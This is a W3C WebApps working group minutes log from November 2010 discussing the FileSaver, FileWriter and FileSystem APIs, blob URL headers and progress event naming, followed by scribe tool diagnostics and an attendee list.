jonas: it's actually a property of the person initiating the load ... make file save support taking url ... same architecture for blobs and urls sam: some browsers default behavior is not prompt and download to directory ... so that'd behave differently ... iframe with content disposition treated as download, file saver treated as save as jonas: i'm not sure we'd behave differently timeless: we shipped that behavior 2+ years ago <timeless> [we = Mozilla/Firefox] ericu: if you want file saver to do the default, that's another behavior jonas: if people only want a download mechanism, we should do it right not extend hack arun: hack exists for http reasons ... ericu's "uber question" is a good one ericu: allowing all headers in seems cleaner anne: it's complicated if we only care about content disposition sam: setting something like x frame options could be useful ... my recollection are that most of these things are attributed to the resource not the url ... it seems a bit hackish to set headers on a blob ericu: agrees. a blob might never be used as a url ... in some cases, the headers are more assicated with the url rather than the resource itself jonas: this discussion has gotten a bit meta ... should the headers arguments exist on the blob or create url function sam: that's one question. the other is whether we need the headers ericu: likes headers. if we have them, put them on createURL function anne: let's move discussion to list ... talks about his sneaky plan ericu: we can go back to file after writer/system questions <timeless> the example for using URL instead of Blob to have the bits is to match Gmail where an image attachment has View and Download links - two urls to the same blob data ericu: doesn't have any issues to bring up anne: can you give a quick introduction? ericu: does said introcution... <timeless> s/cut/duct/ <anne> s/FileSaver/File: Writer and File: Systems and Directories/ sam: so file writer sync doesn't not pop up a dialog? <timeless> s/introcution/introduction/ ericu: yup ... this is just a writing interface...doesn't describe how to get access ... file system spec gives another away to get access to a file ... otherwise the only way is file saver ... file system is like a chrooted environment to create dirs, files, etc ... file system is good if your data isn't structured ... game designers want this for art assets, for example sam: what about indexedb jorlow: or app cache ericu: not good match for app cache...it's all or nothing jonas: thinks system is not needed ... because of indexedDB sam: data cache or an extension to app cache might have worked as well ericu: yes sam: waht about various databases <timeless> s/waht/what/ sam: jonas's face was scary ericu: it's a matter of taste sam: seems like adding this much API surface area for a matter of taste is bad taste ericu: it's more than just taste <arun> arun: I agree with ericu about it being a matter of taste. Some like file system based metaphors, and some like databases for everything. ericu: sharing data with apps outside of the browser is good too sam: indexedDB could store files in the file system if it wanted to ericu: that seems odd. no hierarchy jonas: yeah, no meta data ericu: gives a use case sam: if that's a use case, it should be explicit in spec ... and what about when file system doesn't exist ericu: that's one reason to make it explicit in the spec ... it's a significant motivator, but not required jorlow: you could store meta data ad-hoc in indexedDB if you wanted to jonas: the meta data will be understandable by other apps ... hurdle: some people are nervous about allowing websites to save stuff to a known location sam: we probably want to add changes to mac os X to allow ..? ericu: in current implementation, files not saved in known location ... describes the hack ... many apps know how to scan a hierarchy of dirs (that can scan it in) timeless: then you just exploit some app like iTunes or picassa adrianba: what about social engineering ericu: opening a file deep in the chrome profile dir...? ... and your av software should still run on it adrianba: they have support for knowing the source of the download <timeless> s/picassa/Picasa/ sam: mac os x too jorlow: can't the file system api just set the bits <timeless> windows too adrianba: we distinguish between url and site ericu: this makes it slightly harder, but it's not a fundamental issue adrianba: allowing a web application to save something without immediate consent of user...then social engineering <timeless> [ such as attacking Sherlock, Google Desktop Search ] ericu: it's a valid concern and i understand. you might just need to tweak the reputation system a bit to handle this case sam: my issue is not security, it's that we already have a lot of storage options ... unnecessary risk to throw 2 new APIs at the web at once <arun> OK big +1 to weinig ericu: well it's not there yet and it won't necessarily be popular sam: but it can never be removed jorlow: isn't it behind prefix timeless: that doens't matter much ericu: and actually our implementation is not behind prefix ... which is a fair objection ... a number of devs asked for it sam: web sql is same <timeless> s/doens't/doesn't/ sam: we should have been more careful and not do it ... has actual question ... file saver sync doesn't seem to have an actual interface attached to it? ericu: will fix it sam: from worker, would you pop up save dialog ... what window would it be attached to ericu: shared worker is an odd case jorlow: brought up more shared worker issues similar ericu: yeah...we need to fix some stuff jonas: want file save to be able to handle the url ... content disposition is a hack, so it'd be nice to move away from it <arun> Yeah; while we hash out headers on Blob URIs, I think it's good to allow FileSaver to have a URL argument sam: people already hack around it, iframe trick might as well become official ... anne are you editing progress events? ... is there going to be some way to say some interface implements something...rather than repeating the work for each progress event jonas: there's some web idl way to say supplemental, but reverse ericu: onload start, and that doesn't make sense when you're writing <anne> jonas: interesting situation when you want progress events for something other than loads since much of them have load in the name anne: they're actually specced to be pretty vague ... can't rename them at this point adrianba: could you have multiple names for something sam: this is a bad idea because events are expensive, therefore firing 2 events is expensive ... we've done this for focus and DOM (yell) Focus mjs: you can't actually alias because of add event listener's semantics jonas: agreed, aliasing is bad anne: the event names are just suggestions ... you can call your events whatever you want jonas: it makes sense to do things this way sam: should they be save start? ericu: filewriter derives from this and uses the same events jonas: the interface names are fully generic anne: interface still has loaded ericu: I think I just put done? ... going to fix the spec mjs: we should change the syntax of html <mjs> </sarcasm> ericu: taking a step back.... sam: when people implement event listeners, the event they get will be a little funny because it has words like loaded anne: inherited progress events from svg...no one backed me up mjs: lots of bike shedding jonas: it sucks to add aliases sam: maybe add progress of loaded that calls the same underlying function ... bytes progressed maybe? jonas: just use progress anne: we do have some aliased properties elsewhere I guess ... let's leave "early" anne's chairing skillz are celebrated This is scribe.perl Revision: 1.135 of Date: 2009/03/02 03:52:20 Check for newer version at Guessing input format: RRSAgent_Text_Format (score 1.00) Succeeded: s/even.time/event.time/ Succeeded: s/IE9/IE8-IE9/ Succeeded: s/DOM/done/ Succeeded: s/Byorn/Björn/ Succeeded: s/swaps/mark character/ FAILED: s/Byorn Herman/Björn Höhrmann/ Succeeded: s/in general i think what's important is getting things to the REC track/in general i think what's important is getting things to the REC track, so get in touch with Systems Team earlier rather than later/ Succeeded: s/ons/on/ Succeeded: s/smaug_/smaug/ Succeeded: s/anne/jonas+sam/ Succeeded: s/receive headers/receive content headers/ Succeeded: s/automatic creation to simplify basic generation of/automatic creation to simplify basic generation of simpler tests to supplement hand-written tests/ Succeeded: s/public script/public-script-coord/ FAILED: s/sellenium/Selenium/ Succeeded: s/function testing/functional testing/ FAILED: s/i volunteered testing resources/i volunteer to help define the process proposal/ FAILED: s/Paulo/Pablo/ FAILED: s/Option A/pablo: Option A/ FAILED: s/@@something @@/database contains people, find person with name "foo", be that first or last name/ FAILED: s/permanent/persistent/ FAILED: s/coudl/could/ FAILED: s/doens't/doesn't/ FAILED: s/thigns/things/ FAILED: s/does it/do we/ FAILED: s/Transactions/scribe: anne/ FAILED: i/What is the current topic/scribe: anne FAILED: s/contnet/content/ FAILED: s/cut/duct/ FAILED: s/FileSaver/File: Writer and File: Systems and Directories/ FAILED: s/introcution/introduction/ FAILED: s/waht/what/ FAILED: s/picassa/Picasa/ FAILED: s/doens't/doesn't/ Found ScribeNick: MikeSmith Found Scribe: Mike_Smith Found Scribe: MikeSmith Inferring ScribeNick: MikeSmith Found ScribeNick: timeless_mbp WARNING: No scribe lines found matching ScribeNick pattern: <timeless_mbp> ... Found ScribeNick: timeless Found ScribeNick: timeless Found ScribeNick: timeless Found Scribe: MikeSmith Inferring ScribeNick: MikeSmith Found Scribe: anne Inferring ScribeNick: anne Found Scribe: jorlow Inferring ScribeNick: jorlow Scribes: Mike_Smith, MikeSmith, anne, jorlow ScribeNicks: MikeSmith, timeless_mbp, timeless, anne, jorlow Present: ArtB DougS MikeSmith Geoffrey SamW Maciej DaveR Olli Adrian EliotG LaszloG YaelA AnssiK_SureshC Dom Johnson AnneVK KlausB Wonsuk_Lee RichardT BryanS KaiH Bryan_Sullivan Jonas Pablo Jeremy Andrei BoChen DavidRogers EricU AdamB Anssi_Kostiainen Found Date: 02 Nov 2010 Guessing minutes URL: People with action items: add barstow link xhr[End of scribe.perl diagnostic output]
http://www.w3.org/2010/11/02-webapps-minutes.html
CC-MAIN-2014-35
refinedweb
9,051
61.19
Render a Histogram of salaries Knowing median salaries is great and all, but it doesn't tell you much about what you can expect. You need to know the distribution to see if it's more likely you'll get 140k or 70k. That's what histograms are for. Give them a bunch of data, and they show its distribution. We're going to build one like this: In the shortened dataset, 35% of tech salaries fall between \$60k and \$80k, 26% between \$80k and \$100k etc. Throwing a weighed dice with this random distribution, you're far more likely to get 60k-80k than 120k-140k. It's a great way to gauge situations. It's where statistics like "More people die from vending machines than shark attacks" come from. Which are you afraid of, vending machines or sharks? Stats say your answer should be heart disease. 😉 We'll start our histogram with some changes in App.js, make a Histogram component using the full-feature approach, add an Axis using the blackbox useD3 approach, and finally add some styling. Step 1: Prep App.js You know the drill, don't you? Import some stuff, add it to the render() method in the App component. // src/App.jsimport _ from "lodash"// Insert the line(s) between here...import "./style.css"// ...and here.import Preloader from "./components/Preloader"import { loadAllData } from "./DataHandling"import CountyMap from "./components/CountyMap"// Insert the line(s) between here...import Histogram from "./components/Histogram"// ...and here. We import style.css and the Histogram component. That's what I love about Webpack - you can import CSS in JavaScript. We got the setup with create-react-app. There are competing schools of thought about styling React apps. Some say each component should come with its own CSS files, some think it should be in large per-app CSS files, many think CSS-in-JS is the way to go. Personally I like to use CSS for general cross-component styling and styled-components for more specific styles. We're using CSS in this project because it works and means we don't have to learn yet another dependency. After the imports, we can render our Histogram in the App component. // src/App.js// ...render() {// ...return (<div className="App container"><h1>Loaded {this.state.techSalaries.length} salaries</h1><svg width="1100" height="500"><CountyMap usTopoJson={this.state.usTopoJson}USstateNames={this.state.USstateNames}values={countyValues}x={0}y={0}width={500}height={500}zoom={zoom} />// Insert the line(s) between here...<Histogram bins={10}width={500}height={500}x="500"y="10"data={filteredSalaries}axisMargin={83}bottomMargin={5}value={d => d.base_salary} />// ...and here.</svg></div>);} We render the Histogram component with a bunch of props. They specify the dimensions we want, positioning, and pass data to the component. We're using filteredSalaries even though we haven't set up any filtering yet. One less line of code to change later 👌 That's it. App is ready to render our Histogram. You should now see an error about missing files. That's normal. Step 2: CSS changes As mentioned, opinions vary on the best approach to styling React apps. Some say stylesheets per component, some say styling inside JavaScript, others swear by global app styling. The truth is somewhere in between. Do what fits your project and your team. We're using global stylesheets because it's the simplest. Create a new file src/style.css and add these 29 lines: .histogram .bar rect {fill: steelblue;shape-rendering: crispEdges;}.histogram .bar text {fill: #fff;font: 12px sans-serif;}button {margin-right: 0.5em;margin-bottom: 0.3em !important;}.row {margin-top: 1em;}.mean text {font: 11px sans-serif;fill: grey;}.mean path {stroke-dasharray: 3;stroke: grey;stroke-width: 1px;} We won't go into details about the CSS here. Many better books have been written about it. In broad strokes: - we're making .histogramrectangles – the bars – blue - labels white 12pxfont buttons and .rows have some spacing - the .meanline is a dotted grey with gray 11pxtext. More CSS than we need for just the histogram, but we're already here so might as well write it now. Adding our CSS before building the Histogram means it's going to look beautiful the first time around. Step 3: Histogram component We're following the full-feature integration approach for our Histogram component. React talks to the DOM, D3 calculates the props. We'll use two components: Histogrammakes the general layout, dealing with D3, and translating raw data into a histogram HistogramBardraws a single bar and labels it We create the Histogram.js file. Start with some imports, a default export, and a stubbed out Histogram class. // src/components/Histogram.jsimport React from "react"import * as d3 from "d3"const Histogram = ({bins,width,height,x,y,data,axisMargin,bottomMargin,value,}) => {const histogram = d3.histogram()const widthScale = d3.scaleLinear()const yScale = d3.scaleLinear()return null} We import React and D3, and set up Histogram with 3 D3 elements - a histogram generator - a linear width scale - a linear y scale Rendering the histogram // src/components/Histogram.jsconst histogram = d3.histogram().thresholds(bins).value(value)const bars = histogram(data),counts = bars.map((d) => d.length)const widthScale = d3.scaleLinear().domain([d3.min(counts), d3.max(counts)]).range([0, width - axisMargin])const yScale = d3.scaleLinear().domain([0, d3.max(bars, (d) => d.x1)]).range([height - y - bottomMargin, 0]) First, we configure the histogram generator. thresholds specify how many bins we want and value specifies the value accessor function. We get both from props passed into the Histogram component. In our case that makes 20 bins, and the value accessor returns each data point's base_salary. We feed the data prop into our histogram generator, and count how many values are in each bin with a .map call. We need those to configure our scales. If you print the result of histogram(), you'll see an array structure where each entry holds metadata about the bin and the values it contains. Let's use this info to set up our scales. widthScale has a range from the smallest ( d3.min) bin to the largest ( d3.max), and a range of 0 to width less a margin. We'll use it to calculate bar sizes. yScale has a range from 0 to the largest x1 coordinate we can find in a bin. Bins go from x0 to x1, which reflects the fact that most histograms are horizontally oriented. Ours is vertical so that our labels are easier to read. The range goes from 0 to the maximum height less a margin. Now let's render this puppy. render // src/components/Histogram.js<g className="bars">{bars.map((bar) => (<HistogramBarpercent={(bar.length / data.length) * 100}x={axisMargin}y={yScale(bar.x1)}width={widthScale(bar.length)}height={yScale(bar.x0) - yScale(bar.x1)}key={`histogram-bar-${bar.x0}`}/>))}</g> We take everything we need out of state and props with destructuring, call histogram() on our data to get a list of bars, and render. Our render method returns a <g> grouping element transformed to the position given in props and walks through the bars array, calling makeBar for each. Later, we're going to add an Axis as well. This is a great example of React's declarativeness. We have a bunch of stuff, and all it takes to render is a loop. No worrying about how it renders, where it goes, or anything like that. Walk through data, render, done. Setting the key prop is important. React uses it to tell the bars apart and only re-render those that change. Step 4: HistogramBar (sub)component Before our histogram shows up, we need another component: HistogramBar. We could have shoved all of it in the makeBar function, but it makes sense to keep separate. Better future flexibility. You can write small components like this in the same file as their main component. They're not reusable since they fit a specific use-case, and they're small enough so your files don't get too crazy. But in the interest of readability, let's make a HistogramBar file. // src/components/Histogram.jsconst HistogramBar = ({ percent, x, y, width, height }) => {let translate = `translate(${x}, ${y})`,label = percent.toFixed(0) + "%"if (percent < 1) {label = percent.toFixed(2) + "%"}if (width < 20) {label = label.replace("%", "")}if (width < 10) {<rect width={width} height={height - 2}<text textAnchor="end" x={width - 5} y={height / 2 + 3}>{label}</text></g>)} We start by deciding how much precision to put in the label. Makes the smaller bars easier to read :) Then we render a rectangle for the bar and add a text element for the label. Positioning based on size. You should now see a histogram. Step 5: Axis Our histogram is pretty, but it needs an axis to be useful. You've already learned how to implement an axis when we talked about blackbox integration. We're going to use the same approach and copy those concepts into the real project. Axis component We can use the useD3 hook from my d3blackbox library to make this work quickly. // src/components/Axis.jsimport React from "react"import { useD3 } from "d3blackbox"import * as d3 from "d3"const Axis = ({ x, y, scale, type = "Bottom" }) => {const gRef = useD3((anchor) => {const axis = d3[`axis${type}`](scale)d3.select(anchor).call(axis)})return <g transform={`translate(${x}, ${y})`} ref={gRef} />}export default Axis We use D3's axis generator based on the type prop and pass in a scale. To render, we select the anchor element and call the axis generator on it. Add Axis to Histogram To render our new Axis, we add it to the Histogram component. It's a two step process: - Import Axiscomponent - Render it // src/components/Histogram/Histogram.jsimport React, { Component } from "react"import * as d3 from "d3"// Insert the line(s) between here...import Axis from "./Axis"// ...and here.// ...const Histogram = () => {// ...return (<g className="histogram" transform={translate}><g className="bars">{bars.map(this.makeBar)}</g>// Insert the line(s) between here...<Axis x={axisMargin - 3} y={0} data={bars} scale={yScale} />// ...and here.</g>)} We import our Axis and add it to the render method with some props. It takes an x and y coordinate, the data, and a scale. An axis appears. If that didn't work, try comparing your changes to this diff on Github.
https://reactfordataviz.com/tech-salaries/salaries-histogram/
CC-MAIN-2022-40
refinedweb
1,730
68.67
How can I get values of variables awaiting model update in Gurobi pythonAnswered I develop a quadratic programming model using Gurobi python API. In terms of objective formulation containing a function associated with decision variable, such as obj = f(x) + g(y), I need to get values of the decision variables for the functions f(), g(). This is why the input of functions f(), g() should be list or array type acceptable format to the functions while Gurobi model uses tupledict structure that does not fit for general calculation. How can I get values of variables awaiting model update as below? : x[0] : <gurobi.Var Awaiting Model Update> ---------------------- psedo code --------------------------- import gurobipy as gp from gurobipy import GRB def func(): mdl = gp.Model() x = mdl.addVars(100, lb=0, vtype=GRB.INTEGER) for i in range(100): _x[i] = x[i] # TypeError: float() argument must be a string or a number, not 'Var' _x[i] = x[i].X # AttributeError: Index out of range for attribute 'X' obj = func(_x) mdl.setObjective(obj, GRB.MINIMIZE) The code snippet you provided is not executable and does not lead to the errors you described. It makes it harder to provide help in this case. If you get the "Awaiting Model Update" error, you can execute the update method to make variable's properties accessible before optimization. Please note that the X attribute is only available if a feasible solution point is available, e.g., through a previous optimization run. You can check whether a solution is available via the SolCount attribute. Best regards, Jaromił0 The same question has also been posted on StackOverflow: How can I get values of variables awaiting model update in Gurobi python - Stack Overflow0 Firstly, I apologize insufficient previous inquiry. The point is value extraction of variables before optimization, which cannot be captured with X attribute and it's hard to search update method cases. I present the simple code as below but real quadratic function represented by cal_module() in the sample is much more complicated. In other word, the quadratic function is the object to be combined like MIP + domain function -> MIQP. Therefore during optimizing steps, the decision variables such as x, y need to be converted to numpy or pandas as input for quadratic formulation included in objective function. This is why I asked how to get values of variables which is uncertain at every model iteration? ---------------------- sample --------------------------- import numpy as np import gurobipy as gp from gurobipy import GRB def cal_module(x,y): m = np.array([]) for i in np.arange(len(x)-1): r = x[i]**2 + y[i+1]**3 m = np.append(m, r) return m mdl = gp.Model() x = mdl.addVars(20, lb=-5, ub=5, vtype=GRB.INTEGER) y = mdl.addVars(20, lb=-5, ub=5, vtype=GRB.INTEGER) mdl.addConstrs(x[t] + y[t] <= 3 for t in range(20)) pre_x, pre_y = [], [] for i in range(20): pre_x = x[i].value_method or any other approach pre_y = y[i].value_method or any other approach obj = gp.quicksum(-2*x[t] + y[t] for t in range(20)) + cal_module(pre_x,pre_y) mdl.setObjective(obj, GRB.MINIMIZE) mdl.optimize()0 If I understand correctly, you are trying to construct a quadratic expression, add it to the objective function, and optimize it. You can and should work with the variable objects directly to achieve this. The following code should do what you have in mind import gurobipy as gp from gurobipy import GRB def cal_module(x, y, model): qExpr = gp.QuadExpr(0) for i in range(len(x)-1): z = model.addVar(lb=0, ub=25, vtype=GRB.INTEGER, name="aux_y_sqr_%d"%(i+1)) model.addConstr(z == y[i+1]*y[i+1], name="aux_y_sqr_constr_%d"%(i+1)) qExpr.add(x[i]**2 + y[i+1]*z) return qExpr mdl = gp.Model() x = mdl.addVars(20, lb=-5, ub=5, vtype=GRB.INTEGER, name="x") y = mdl.addVars(20, lb=-5, ub=5, vtype=GRB.INTEGER, name="y") mdl.addConstrs(x[t] + y[t] <= 3 for t in range(20)) obj = gp.quicksum(-2*x[t] + y[t] for t in range(20)) + cal_module(x,y,mdl) mdl.setObjective(obj, GRB.MINIMIZE) mdl.setParam("NonConvex",2) mdl.write("myLP.lp") mdl.optimize() Note that the variable tupledicts \(\texttt{x,y}\) are directly passed to the \(\texttt{def_module}\) function. Since Gurobi does not support cubic terms \(y^3\), you have to add an auxiliary variable to model the cubic term as a quadratic and a bilinear term \(z = y^2\) and \(y\cdot z\), see How do I model multilinear terms in Gurobi? Your model is nonconvex, thus the parameter NonConvex has to be set. I used the write method to write an LP file, which makes analyzing whether the model is indeed a correct one, easier. Best regards, Jaromił0 Hi Jaromił, Your comments were really helpful to understand Gurobi's solving flow. Many thanks. When it comes to the quadratic expression, my problem is actually nonlinear (not quadratic), which represents a physical formulation and seems like almost impossible to convert into model using gurobi library based variable because of its complexity. As a result, I want to capture any attribute of variable before solved with update() method. The attribute I look for is something like a state that the variable contains 0(zero) or other value, however I couldn't find such attributes in the gurobi document, Rephrasing the question, I wonder I can get to know if the value of variable before optimization is zero(0) or not. Best regards, Namkyoung Lee0 Hi Namkyoung Lee, If I understand your comment correctly, you are trying to model a conditional statement, i.e., something like if variable \(x=0\) then use constraint \(a\) otherwise use constraint \(b\). Is this correct? If yes, then the article How do I model conditional statements in Gurobi? should be what you are looking for. If not, could you please elaborate a bit further? Maybe provide a small example of what you are tying to model. Best regards, Jaromił0 Hi Jaromił, I appreciate your continuance of help. This is another sample code, which contains an error about indicator constraint. I pursue constructing formulation with input whether variables have value of 0 or positive integer. Best regards, Nam-kyoung import gurobipy as gp from gurobipy import GRB def tmp_f(x): k = np.array([1 for i in range(10)]) for j in x: k[j] = 0 return sum((k+1)**2) m = gp.Model("qp") x = m.addVars(10 ,lb=0, ub=10, vtype=GRB.INTEGER, name="x") y = m.addVars(10, lb=0, ub=10, vtype=GRB.INTEGER, name="y") b = m.addVars(10, vtype=GRB.BINARY, name="b") # Basic constraints m.addConstrs(x[i] + 2 * y[i] <= 21 for i in range(10)) m.addConstrs(x[i] - y[i] >= 0 for i in range(10)) m.addConstr(x.sum('*') == 9) # big-M approach eps = 0.000001 M = 100 + eps # Model if x > 0 then b = 1, otherwise b = 0 m.addConstrs(x[i] >= eps - M * (1 - b[i]) for i in range(10)) m.addConstrs(x[i] <= M * b[i] for i in range(10)) # Indicator constraints z = [] # ← ← ← Initialization of an input for nonlinear-type formulation t = -1 for i in range(10): m.addConstr((b[i] == 1) >> (t == i)) z.append(t) # Objective function obj = gp.quicksum(x[i] + y[i] for i in range(10)) m.setObjective(obj + tmp_f(z), GRB.MAXIMIZE) m.optimize()0 This thread is continued in Indicator constraint which contains constant value.0 Please sign in to leave a comment.
https://support.gurobi.com/hc/en-us/community/posts/4416886974609-How-can-I-get-values-of-variables-awaiting-model-update-in-Gurobi-python?page=1#community_comment_4417055700497
CC-MAIN-2022-21
refinedweb
1,267
59.3
Interpre: locale) (defines significand) eor Efollowed with optional minus or plus sign and nonempty sequence of decimal digits (defines exponent) 0xor 0X locale) (defines significand) por Pfollowed with optional minus or plus sign and nonempty sequence of decimal digits (defines exponent) INFor INFINITYignoring case NANor NAN(char_sequence )ignoring case of the NANpart. char_sequence can only contain digits, Latin letters, and underscores. The result is a quiet NaN floating-point value. locale The functions sets the pointer pointed to by str_end to point to the wide character past the last character interpreted. If str_end is NULL, it is ignored. Floating point value corresponding to the contents of str on success. If the converted value falls out of range of corresponding return type, range error occurs and HUGE_VAL, HUGE_VALF or HUGE_VALL is returned. If no conversion can be performed, 0 is returned. #include <stdio.h> #include <errno.h> #include <wchar.h> int main(void) { const wchar_t *p = L"111.11 -2.22 0X1.BC70A3D70A3D7P+6 1.18973e+4932zzz"; printf("Parsing L\"%ls\":\n", p); wchar_t *end; for (double f = wcstod(p, &end); p != end; f = wcstod(p, &end)) { printf("'%.*ls' -> ", (int)(end-p), p); p = end; if (errno == ERANGE){ printf("range error, got "); errno = 0; } printf("%f\n", f); } } Output: Parsing L"111.11 -2.22 0X1.BC70A3D70A3D7P+6 1.18973e+4932zzz": '111.11' -> 111.110000 ' -2.22' -> -2.220000 ' 0X1.BC70A3D70A3D7P+6' -> 111.110000 ' 1.18973e+4932' -> range error, got inf © cppreference.com Licensed under the Creative Commons Attribution-ShareAlike Unported License v3.0.
https://docs.w3cub.com/c/string/wide/wcstof/
CC-MAIN-2020-40
refinedweb
253
58.18
Multiple errors building NPP 7.5.6 Hello, Building NPP 7.5.6 with VS Community 2013 results in multiple errors. And many more. The last version I built successfully was NPP 7.5. I’d appreciate your help. Hi Yaron, long time not seen - how you are doing, hopefully fine. As of MS, those should be available in <sys\stat.h> Maybe you need to include this in VS 2013 CE explicitly. Cheers Claudia - Vitaliy Dovgan That must be my fault - I compiled Notepad++ only in VS 2015, did not try the 2013 one. The additional #include <sys/stat.h> should fix it indeed. Hello Claudia, It’s always a pleasure to communicate with you. I’m fine, thank you. I hope you’re as well. Adding #include <sys/stat.h>to Common.cpphas indeed solved the errors appearing in the screenshot above. I’m still getting the these errors. Could you please enlighten me as to how you found <sys/stat.h>? Did you search _S_IREAD? Thank you for your kind help. I do appreciate it. Hello Vitaliy, Thank you for your reply too. Appreciated. Best regards. thx, I’m fine. Yes,actually I was searching for _S_IREAD and _S_IEXEC and I always add msdn if it is development related, to the search to get the MS ones first. But looks like there is something in addition missed. Let’s see what the gitlog says about changes. 'Till then … Cheers Claudia the new version uses keywords like noexcept which aren’t available for VS versions < 2015, so we either could try to hack around by defining macros changing source code etc… or you need to update to a newer VS. Btw. I’m really impressed about VS2017 which works even on my old pc and running in a virtual machine very well. Cheers Claudia - Vitaliy Dovgan VS 2013 does not completely comply even with C++11, not saying about C++14, so a newer version of VS is recommended. It may be strange to hear such words from a person who wants Notepad++ to be compatible with Windows XP and who was still using VS 2005 (together with VS 2013, though) just a year or two ago, but: - VS 2015 and VS 2017 does support Windows XP targeting and - the newer VS version is used the more latest C++ features are available to the developers. Taking this into account, as well as the availability of free Community or Express versions of latest VS, there is no much sense in staying on VS 2013 - plus, VS 2013 and VS 2015 or newer can co-exist under the very same system, if there is a need to still have VS 2013. Hello Claudia, Thanks again for looking into it and solving the problem. I do appreciate it. I understand I should be able to build NPP with VS 2017 (using notepadPlus.vcxprojand not notepadPlus.vs2013.vcxproj), correct? VS installation is quite mammoth. :) How would you handle it? Completely uninstalling VS 2013 (assuming I don’t need it)? Hello Vitaliy, Thank you for the additional info. I appreciate that. Best regards. Hi Yaron, if you don’t need VS2013 anymore, why wasting GB of space - remove it but as Vitaliy stated, both can coexist just in case you still need it. Unfortunately VS2017 forces you to have windows account otherwise you can’t unlock the test version and yes, the vcxproj is the one I used as well. Cheers Claudia Hello Claudia, Thanks again for your kind help. Appreciated as always. Best regards. Hello Claudia and Vitaliy, Last week I installed VS 2017 Community and built NPP 7.5.6. Thanks again for your help. I tried today to check Preferences -> General -> Document List Panel - Showand NPP crashed. Thinking it was due to some of my code changes, I downloaded the repository again and built it as is. The same result - NPP crashes. Building: I doubled clicked notepadPlus.vcxproj, was prompted to add support for xp and built the solution. Using the original binary included in the official packages, the crash does not occur. Any idea? Best regards. as I did - but no crashes so far and is this reproducible? Which VS version do you run? Microsoft Visual Studio Community 2017 Version 15.6.3 VisualStudio.15.Release/15.6.3+27428.2011 Microsoft .NET Framework Version 4.7.02558 Installed Version: Community Did you change something on the build process? Build events? How do you start npp? From within the build directory? x64 or x32 ? (I tested only x64) Cheers Claudia Hello Claudia, Thank you very much for the prompt reply. I do appreciate it. The only thing I modified was from x64to x86and to Releaseinstead of Debug. No errors or warnings. I’ve used it for a few days without any problem. Trying today to display the Document List Panel, the crash happened. It is consistent; whenever I try to check that option NPP crashes. I downloaded a fresh portable NPP and replaced the binary with my build. Best regards. Yaron, just did a x86 release build and looks ok - I guess you assumed that this is the case. From the code I only could guess that there might be a problem with your configuration files. If you have downloaded an official zipped package, could you replace the official builded npp exe with the one you build and run it within this directory. If this works then it indicates that one of your configuration files is corrupt. If it doesn’t work … hmmm … which operating system do you run? Cheers Claudia Hello Claudia, Thanks again for your time and effort. If you have downloaded an official zipped package, could you replace the official builded npp exe with the one you build and run it within this directory. That is just what I have done. :) Win 7 x32. Best regards. I thought you did it the other way, you copied the official exe to your directory but I was looking for copying your exe to the official unzipped directory, so that your exe is running with the official configuration files. Or did you already check both ways? Cheers Claudia Both ways. Thanks again. Appreciated. Yaron , then I would say time to debug. Either run from within VS (copy everything to the build directory) or attach it to the running exe, but then make sure the pdb files are found. Just for info - I have to stay up early tomorrow so I have to stop here. But if there is anything I could do we can follow up tomorrow night :-) Cheers Claudia Hello Claudia, I’ve never used the Debugger. :) It might also be some general setting I’ve modified in VS. We’ll see tomorrow. Thanks again and good night. Hello Claudia, I’ve created a Dump file, opened it in VS and used “Debug with Native Only”. Interestingly, if I check Hide Extension Columnfirst and then Show- the crash does not happen. Whenever you have some free time. Thanks again. Best regards. Hi Yaron, can you set a breakpoint onto line 100 in VerticalFileSwitchesListView.cpp like here run the project by pressing F5, once npp appears do the setting changes and then when VS comes up with the breakpoint step through it with F10 until you receive the access denied exception, then we know which part exactly throws that exception. Cheers Claudia
https://notepad-plus-plus.org/community/topic/15438/multiple-errors-building-npp-7-5-6
CC-MAIN-2018-51
refinedweb
1,233
75.5
Template::Plugin::Cache - cache output of templates [% USE cache = Cache %] [% cache.inc( 'template' => 'slow.html', 'keys' => {'user.name' => user.name}, 'ttl' => 360 ) %] # or with a pre-defined Cache::* object and key [% USE cache = Cache( cache => mycache ) %] [% cache.inc( 'template' => 'slow.html', 'key' => mykey, 'ttl' => 360 ) %] The Cache plugin allows you to cache generated output from a template. You load the plugin with the standard syntax: [% USE cache = Cache %] This creates a plugin object with the name 'cache'. You may also specify parameters for the default Cache module (Cache::FileCache), which is used for storage. [% USE mycache = Cache(namespace => 'MyCache') %] Or use your own Cache object: [% USE mycache = Cache(cache => mycacheobj) %] The only methods currently available are include and process, abbreviated to "inc" and "proc" to avoid clashing with built-in directives. They work the same as the standard INCLUDE and PROCESS directives except that they will first look for cached output from the template being requested and if they find it they will use that instead of actually running the template. [% cache.inc( 'template' => 'slow.html', 'keys' => {'user.name' => user.name}, 'ttl' => 360 ) %] The template parameter names the file or block to include. The keys are variables used to identify the correct cache file. Different values for the specified keys will result in different cache files. The ttl parameter specifies the "time to live" for this cache file, in seconds. Why the ugliness on the keys? Well, the TT dot notation can only be resolved correctly by the TT parser at compile time. It's easy to look up simple variable names in the stash, but compound names like "user.name" are hard to resolve at runtime. I may attempt to fake this in a future version, but it would be hacky and might cause problems. You may also use your own key value: [% cache.inc( 'template' => 'slow.html', 'key' => yourkey, 'ttl' => 360 ) %] That cache is for caching the template files and the compiled version of the templates. This cache is for caching the actual output from running a template. There are two situations where this might be useful. The first is if you are using a plugin or object inside your template that does something slow, like accessing a database or a disk drive or another process. The DBI plugin, for example. I don't build my apps this way (I use a pipeline model with all the data collected before the template is run), but I know some people do. The other situation is if you have an unusually complex template that takes a significant amount of time to run. Template Toolkit is quite fast, so it's uncommon for the actual template processing to take any noticeable amount of time, but it is possible in extreme cases. Because Cache::FileCache is by far the fastest in nearly all cases. I could, if there is a demand for it. If you have a template that produces side effects when run, like modifying a database or object, these side effects will not be captured and caching will break them. The cache only caches actual template output. Of course, if you have a template which produces side effects, you are a very naughty person and you get what you deserve. Perrin Harkins (perrin@elem.com <mailto:perrin@elem.com>) wrote the first version of this plugin, with help and suggestions from various parties. Peter Karman <peter@peknet.com> provided a patch to accept an existing cache object. This module is free software; you can redistribute it and/or modify it under the same terms as Perl itself. Template::Plugin, Cache::FileCache
http://search.cpan.org/dist/Template-Plugin-Cache/Cache.pm
CC-MAIN-2016-36
refinedweb
601
74.39
